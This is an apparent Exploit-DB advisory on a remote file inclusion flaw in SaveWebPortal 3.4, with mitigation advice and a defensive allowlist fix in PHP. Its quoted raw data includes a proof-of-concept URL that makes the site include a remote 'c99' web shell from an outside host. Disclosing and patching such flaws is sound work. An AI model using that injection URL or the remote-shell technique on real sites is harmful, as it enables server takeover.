Vendor: SaveWebPortal
By: x0rax
CVSS: 7,5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 94
Product Name: SaveWebPortal
Affected Version From: 3.4 and below
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability

SaveWebPortal version 3.4 and below is vulnerable to Remote File Inclusion. The 'page' parameter of index.php is passed to include() after only a check that the value contains ".php", ".htm" or ".html", so an attacker can point it at a remote file and have arbitrary code executed. The attacker must create a file called shell.html.txt or shell.php.txt in order for the exploit to be successful.

Mitigation:

Upgrade to the latest version of SaveWebPortal, or apply the patch provided by the vendor.
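
The check in the vulnerable index.php only tests whether `.php`, `.htm` or `.html` appears somewhere in `page`, which a full URL also satisfies. An allowlist-based replacement for that include, as an added example (not SaveWebPortal's code or the vendor's patch; the page keys, file names and `pages/` directory are hypothetical):

```php
<?php
// Added example, not SaveWebPortal's code or the vendor's patch.
// Page keys, file names and the pages/ directory are hypothetical.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file on disk. Nothing outside this map is included.
const PAGES = [
    'home'      => 'home.php',
    'downloads' => 'downloads.php',
    'contact'   => 'contact.html',
];

/**
 * Resolve a user-supplied page key to a local file path, or null if rejected.
 * The request value is only ever used as a lookup key, never as a path or URL.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);

    // Defence in depth: the file must exist and resolve inside PAGE_DIR,
    // which also catches a symlink that points somewhere else.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    // Unknown key, URL, traversal string: all end here without touching include.
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Independently of the code, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops `include` from fetching `http://` and `ftp://` URLs at all.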
Source

Exploit-DB raw data:

--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
Master9976@hotmail.de
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                       strstr ($page, ".htm") ||
                       strstr ($page, ".html")) {
                       include ("$page");
....
?>
--------------------------------------------
To inject successfully you have to create a file called shell.html.txt or
shell.php.txt,
otherwise it won't work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------

# milw0rm.com [2006-08-10]